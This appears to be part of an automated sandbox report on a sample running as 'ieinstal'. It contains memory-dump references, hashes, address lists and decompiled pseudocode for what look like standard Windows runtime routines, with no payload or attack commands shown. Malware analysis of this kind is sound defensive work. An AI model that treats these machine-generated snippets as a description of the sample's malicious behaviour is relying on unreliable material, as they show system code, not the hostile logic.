0x2272703e
0x22727055
0x2272705a
0x22727062
0x2276f908
0x2276f90e
0x2276f90f
0x2276f90f
0x2276f908
0x22727062
0x2272705a
0x00000000
0x22727045
0x22727045
0x22727049
0x2272704a
0x2272704d
0x2272704e
0x00000000
0x2272704e
0x2272703e
0x22727068
0x22727069
0x00000000
0x22727069
0x22727301
0x22727304
0x22727314
0x22727314
0x22727319
0x00000000
0x00000000
0x22727325
0x2272732d
0x22727330
0x22727356
0x22727357
0x00000000
0x00000000
0x00000000
0x00000000
0x22727332
0x22727332
0x22727337
0x00000000
0x00000000
0x22727343
0x2272734b
0x2272734e
0x22727361
0x00000000
0x00000000
0x22727367
0x22727367
0x22727368
0x00000000
0x22727368
0x22727350
0x22727351
0x22727351
0x00000000
0x22727332
0x2276f8f9
0x2276f8f9
0x2276f8fa
0x00000000
0x2276f8fa
0x22727306
0x2272730e
0x2276f8ee
0x00000000
0x00000000
0x2276f8f4
0x00000000
0x2272730e
0x22727214
0x22727214
0x22727217
0x00000000
0x22727217
0x2272702c
0x00000000
0x00000000
0x00000000
0x00000000
0x2272702c
0x2272708d
0x22727094
0x22727098
0x227270a0
0x2272738c
0x2272738d
0x2272738d
0x227270a0
0x22727098
0x227270a6
0x227270ab
0x227270b3
0x227270b5
0x227270cd
0x227270cd
0x227270d0
0x227270d8
0x2272711a
0x2272711c
0x2272711c
0x22727121
0x00000000
0x00000000
0x22727129
0x00000000
0x00000000
0x2272712b
0x2272712b
0x22727130
0x2272737e
0x22727381
0x00000000
0x22727381
0x22727138
0x00000000
0x00000000
0x22727144
0x22727144
0x227270da
0x227270da
0x227270dd
0x00000000
0x227270dd
0x227270b7
0x227270b8
0x227270bb
0x227270c2
0x00000000
0x00000000
0x227270c7
0x00000000
0x00000000
0x227270c9
0x227270ca
0x00000000
0x227270ad
0x227270ad
0x227270af
0x00000000
0x227270af
0x22727148
0x2272714d
0x2276f8e2
0x2276f8e2
0x22727153
0x22727154
0x22727157
0x00000000
0x22727157
0x2276f87c
0x2276f87f
0x2276f882
0x00000000
0x2276f882
0x2276f85e
0x00000000
0x00000000
0x2276f864
0x2276f869
0x2276f86c
0x00000000
0x2276f86c
0x22727168
0x22727170
0x2276f8d6
0x2276f8d6
0x22727176
0x22727179
0x00000000
0x22727179
0x22726fe9
0x22726fe9
0x00000000
0x22726fe9
0x22726fbf
0x22726f8c
0x22726f93
0x227272d6
0x00000000
0x00000000
0x00000000
0x227272d6
0x22726f99
0x22726f99
0x22726f99
0x00000000
0x22726f68
0x22726f50
0x22726f56
0x2272722c
0x2276f629
0x2276f629
0x00000000
0x2276f629
0x22727232
0x22727239
0x2276f623
0x00000000
0x00000000
0x00000000
0x2276f623
0x2272723f
0x22727242
0x2276f64e
0x2276f64e
0x00000000
0x2276f64e
0x22727248
0x2272724f
0x22727373
0x00000000
0x00000000
0x00000000
0x22727379
0x22727255
0x22727258
0x2276f63c
0x2276f648
0x00000000
0x2276f648
0x2272725e
0x22727265
0x2276f636
0x00000000
0x00000000
0x00000000
0x2276f636
0x2272726b
0x2272726b
0x00000000
0x00000000
0x00000000
0x00000000
0x22726f56
0x22726f3d
0x22726ed2
0x00000000
0x22726ec4

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31ec02a2875df9c182aeee1128817e93c098caead6b334369d842648aac88b05
Instruction ID: c0735b2317e1b0f84f249562ee62ecbf6f24c6395274b9aa46260660247133b0
Opcode Fuzzy Hash: 31ec02a2875df9c182aeee1128817e93c098caead6b334369d842648aac88b05
Instruction Fuzzy Hash: 5602BE70D08B55CBCB24CF99C680AEDB7F1FF49704F61822EE915AB291E7709985CB81

Uniqueness

Uniqueness Score: -1.00%

Function 2255C756 Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000003.497892554.0000000022539000.00000004.00000020.00020000.00000000.sdmp, Offset: 22539000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_22539000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88cc3043ab303c00f13d02a66b6865740f50dbc4145538452929444818b15b84
Instruction ID: 4788dd9591116c4de9db57f31434da6e44faec4f19af5861f04097429836b08c
Opcode Fuzzy Hash: 88cc3043ab303c00f13d02a66b6865740f50dbc4145538452929444818b15b84
Instruction Fuzzy Hash: FBC19E71604301AFC700AF64ED88B6ABBF9FF88725F00892EF956C66A0D771D591CB52

Uniqueness

Uniqueness Score: -1.00%

Function 2255C42C Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000003.497892554.0000000022539000.00000004.00000020.00020000.00000000.sdmp, Offset: 22539000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_22539000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9d432cbaa0706e83112d44238849be7c1c25483ebe21f389f8a784e6ee22774
Instruction ID: 98ef2d650dd73f0833991eda5e33cf17c1ecc41aa622c9cf7ac52ae33a640bf7
Opcode Fuzzy Hash: e9d432cbaa0706e83112d44238849be7c1c25483ebe21f389f8a784e6ee22774
Instruction Fuzzy Hash: AE91D0357043028BC714DF68C99066BBBE2FFD8745B45CA2EE94687250EB31DA56CB81

Uniqueness

Uniqueness Score: -1.00%

Function 22560240 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000003.497892554.0000000022539000.00000004.00000020.00020000.00000000.sdmp, Offset: 22539000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_22539000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba7114e01523434a979c2862074d63e21bb289fa8e9868b45d22e137ea2442d0
Instruction ID: 0b8507e962d4dec2969a617e0b40f1f5bee590c93240056ac624f2d57aaebf51
Opcode Fuzzy Hash: ba7114e01523434a979c2862074d63e21bb289fa8e9868b45d22e137ea2442d0
Instruction Fuzzy Hash: ABA1E474E023159BCB64DF28DD457BABBB5FF84714F44C29AE809E7650EB309A81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 22736A60 Relevance: .2, Instructions: 227
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E22736A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0x227fd360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					L22749810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0x227f6908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = L2274CF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							L2274CF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E2274D340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E2274B640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push("true");
						_t146 =  &_v24;
						_push(_t146);
						_push("true");
						_push( &_v56);
						_push(0xb5);
						_t122 = E2274AA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							L2274D000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push("true");
							_push( &_v56);
							_push(0xb5);
							_t122 = E2274AA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}

0x22736a6f
0x22736a72
0x22736a78
0x22736a7c
0x22736a7f
0x22736a87
0x22778049
0x22778049
0x2277804e
0x2277804f
0x22778057
0x2277805c
0x00000000
0x22736a8d
0x22736a92
0x22736a92
0x22736a94
0x22736a99
0x22736a9c
0x22736a9f
0x22736aa2
0x22736aaa
0x22736ab0
0x22777eae
0x22777eb4
0x22777eb9
0x00000000
0x00000000
0x00000000
0x00000000
0x22777ebf
0x22777ebf
0x22777ebf
0x22777ec1
0x22777ec6
0x00000000
0x00000000
0x22777ece
0x22777edb
0x22777ee5
0x22777ee7
0x22777ee7
0x22777edd
0x22777edd
0x22777edd
0x22777eea
0x22777ed0
0x22777ed0
0x22777ed3
0x22777ed3
0x22777eec
0x22777ef8
0x22777f00
0x22777f07
0x22777f0a
0x22777f19
0x22777f1b
0x22777f23
0x22777f25
0x22777f28
0x22777f2e
0x22777f31
0x22777f34
0x22777f37
0x22777f3c
0x00000000
0x22777f3e
0x22777f3e
0x22777f41
0x22736b35
0x22736b38
0x22736b44
0x22736b4c
0x22736b4e
0x22736b51
0x22736b69
0x22736b69
0x22777f3c
0x22778046
0x00000000
0x22778046
0x22736abc
0x22736aca
0x22777f49
0x22736b13
0x22736b13
0x22736b16
0x22736b1e
0x22777fe7
0x22777fea
0x22777fed
0x22777ff0
0x22777ff2
0x22777ff4
0x22777ffa
0x00000000
0x00000000
0x22778000
0x22778003
0x22778006
0x22778009
0x2277800b
0x2277800d
0x22778010
0x2277801f
0x00000000
0x00000000
0x22778025
0x22736b2f
0x22736b2f
0x22736b32
0x00000000
0x22736b32
0x22736b26
0x22778030
0x2277803a
0x2277803c
0x2277803c
0x22778032
0x22778032
0x22778032
0x2277803f
0x22736b2c
0x22736b2c
0x22736b2c
0x00000000
0x22736b26
0x22736ad0
0x22736ad6
0x22736ade
0x22736ae0
0x22736ae0
0x22736ae5
0x22777f53
0x22736aeb
0x22736aeb
0x22736aeb
0x22736af3
0x22777f5e
0x22777f61
0x22777f68
0x22777f69
0x22777f6b
0x22777f70
0x22777f71
0x22777f76
0x22777f77
0x22777f7c
0x22777f86
0x22777f88
0x22777f8d
0x22777f92
0x22777f97
0x22777f98
0x22777f99
0x22777f9a
0x22777f9f
0x22777fa0
0x22777fa5
0x22777faa
0x22777faa
0x22777faf
0x22777fdc
0x22777fdf
0x00000000
0x22777fb1
0x22777fb1
0x22777fb3
0x22777fb8
0x22777fd4
0x22777fd4
0x00000000
0x22777fd4
0x22777fba
0x22777fbc
0x22777fc2
0x22777fc4
0x22777fc4
0x22777fc7
0x22777fcb
0x22777fcc
0x22777fd1
0x00000000
0x22777fd1
0x22736b04
0x22736b04
0x22736b0b
0x00000000
0x00000000
0x22736b11
0x00000000
0x22736b11
0x22736af3

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42d674ecbf62e78b23e2dca401b00245045c21d2ab9b06fb024a2a496a6ad1f
Instruction ID: 5dba760fbb11385c4749d945179450aad519aeff8f92400f81110737c00560dc
Opcode Fuzzy Hash: c42d674ecbf62e78b23e2dca401b00245045c21d2ab9b06fb024a2a496a6ad1f
Instruction Fuzzy Hash: B2819B71E083199FDF11CF98CA81BEEBBF5AF09344F148169E948AB241D775A901CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 2270C600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E2270C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x227fd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(L22716D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E2274B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x227f7b9c; // 0x0
					_t74 = L22724620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push("true");
					_push( &_v1048);
					_push(_t116);
					_t122 = E22749650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L227277F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_push(_t102 + 0xc);
								_push(_t110);
								L54:
								L2274F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_push("true");
							_pop(_t118);
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_push(_t102 + 0xc);
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											 *((intOrPtr*)(_t125 + 0x20)) = _t102 + 0xc;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = L227413C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_push("true");
								_pop(_t118);
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L227277F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push("true");
				_push( &_v1048);
				_push(_t116);
				_t122 = E22749650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x2270c608
0x2270c615
0x2270c625
0x2270c62d
0x2270c635
0x2270c640
0x2270c680
0x2270c687
0x2270c688
0x2270c689
0x2270c694
0x2270c694
0x2270c642
0x2270c64a
0x2270c697
0x22777a25
0x22777a2b
0x22777a2e
0x22777a30
0x22777bea
0x22777bea
0x00000000
0x22777bea
0x22777a36
0x22777a43
0x22777a48
0x22777a4c
0x22777a4e
0x00000000
0x00000000
0x22777a58
0x22777a5a
0x22777a5b
0x22777a5c
0x22777a5d
0x22777a63
0x22777a64
0x22777a6a
0x22777a6c
0x22777a6e
0x227779cb
0x227779cb
0x227779ce
0x227779d0
0x22777a98
0x22777a9b
0x22777a9b
0x22777a9e
0x22777aa1
0x22777bbe
0x22777bbe
0x22777bc0
0x22777be0
0x22777be0
0x22777a01
0x22777a01
0x22777a05
0x22777a07
0x22777a15
0x22777a15
0x22777a1a
0x00000000
0x22777a1a
0x22777bc2
0x22777bc6
0x22777bc9
0x22777bcd
0x22777bcf
0x227779e6
0x227779e6
0x227779eb
0x227779eb
0x227779ef
0x227779f1
0x00000000
0x00000000
0x227779f3
0x227779f5
0x227779ff
0x227779ff
0x00000000
0x227779ff
0x227779f7
0x227779fd
0x00000000
0x00000000
0x00000000
0x227779fd
0x22777bd5
0x22777bd8
0x00000000
0x00000000
0x22777ba9
0x22777baf
0x22777bb0
0x22777bb1
0x22777bb1
0x22777bb6
0x00000000
0x22777bb6
0x22777aa7
0x22777aaa
0x00000000
0x00000000
0x22777ab0
0x22777ab2
0x22777ab3
0x22777ab5
0x22777aec
0x22777aef
0x22777b25
0x22777b28
0x22777b62
0x22777b64
0x22777b8f
0x22777b92
0x22777b96
0x22777b98
0x00000000
0x00000000
0x22777b9e
0x22777ba2
0x22777ba3
0x00000000
0x22777ba3
0x22777b66
0x22777b68
0x22777ae2
0x22777ae2
0x00000000
0x22777ae2
0x22777b6e
0x22777b72
0x22777b75
0x22777b81
0x22777b85
0x22777b87
0x00000000
0x00000000
0x22777b34
0x22777b3c
0x22777b45
0x22777b46
0x22777b4f
0x22777b51
0x22777b57
0x22777b59
0x22777b59
0x00000000
0x22777b59
0x22777b77
0x00000000
0x22777b77
0x22777b2a
0x00000000
0x22777b2a
0x22777af1
0x22777af3
0x00000000
0x00000000
0x22777af9
0x22777afb
0x22777afc
0x22777afe
0x00000000
0x00000000
0x22777b00
0x22777b03
0x00000000
0x00000000
0x22777b05
0x22777b09
0x22777b0d
0x22777b0f
0x00000000
0x00000000
0x22777b18
0x22777b1d
0x00000000
0x22777b1d
0x22777ab7
0x22777ab9
0x00000000
0x00000000
0x22777abf
0x22777ac1
0x00000000
0x00000000
0x22777ac3
0x22777ac6
0x00000000
0x00000000
0x22777ac8
0x22777acc
0x22777ad0
0x22777ad2
0x00000000
0x00000000
0x22777adb
0x00000000
0x22777adb
0x227779d6
0x227779d9
0x227779dc
0x22777a91
0x22777a94
0x00000000
0x22777a94
0x227779e2
0x00000000
0x227779e2
0x22777a74
0x22777a7a
0x00000000
0x00000000
0x22777a8a
0x22777a21
0x22777a21
0x00000000
0x22777a21
0x2270c650
0x2270c651
0x2270c656
0x2270c65c
0x2270c65d
0x2270c663
0x2270c664
0x2270c66a
0x2270c66e
0x227779c5
0x227779c7
0x00000000
0x227779c7
0x2270c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02392de8fb3c300b43f29e764149e3eb8350bf9291fcb4ac5d879f70078a2474
Instruction ID: 61d520a649ff6416bfe91a7bfb8749798aa32bba8384f42cfaf2b1f4e4d69da1
Opcode Fuzzy Hash: 02392de8fb3c300b43f29e764149e3eb8350bf9291fcb4ac5d879f70078a2474
Instruction Fuzzy Hash: B6817A7664C3419BDF12CF18C980FAAB3F8EB88354F15496AED449B251E730DE44CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 22564830 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000003.497892554.0000000022539000.00000004.00000020.00020000.00000000.sdmp, Offset: 22539000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_22539000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14210d38384622dfd14fecd739d38f54d60145ee0f4d3b395cd76ba6de60e244
Instruction ID: 0429a706492cea0145cc6150ca607bfef90ee0b60501cefe248cbc16e73640f2
Opcode Fuzzy Hash: 14210d38384622dfd14fecd739d38f54d60145ee0f4d3b395cd76ba6de60e244
Instruction Fuzzy Hash: 67519B75A00315AFDB149FB4CD44BBEBBB9FF88204B108669E906E7250EB35DE41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 227052A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E227052A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E2271EEF0(0x227f79a0);
					_t104 =  *0x227f8210; // 0x68e2e88
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E2271EB70(_t93, 0x227f79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = L22749890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E2271EEF0(0x227f79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E2271EB70(0, 0x227f79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x68e2e95
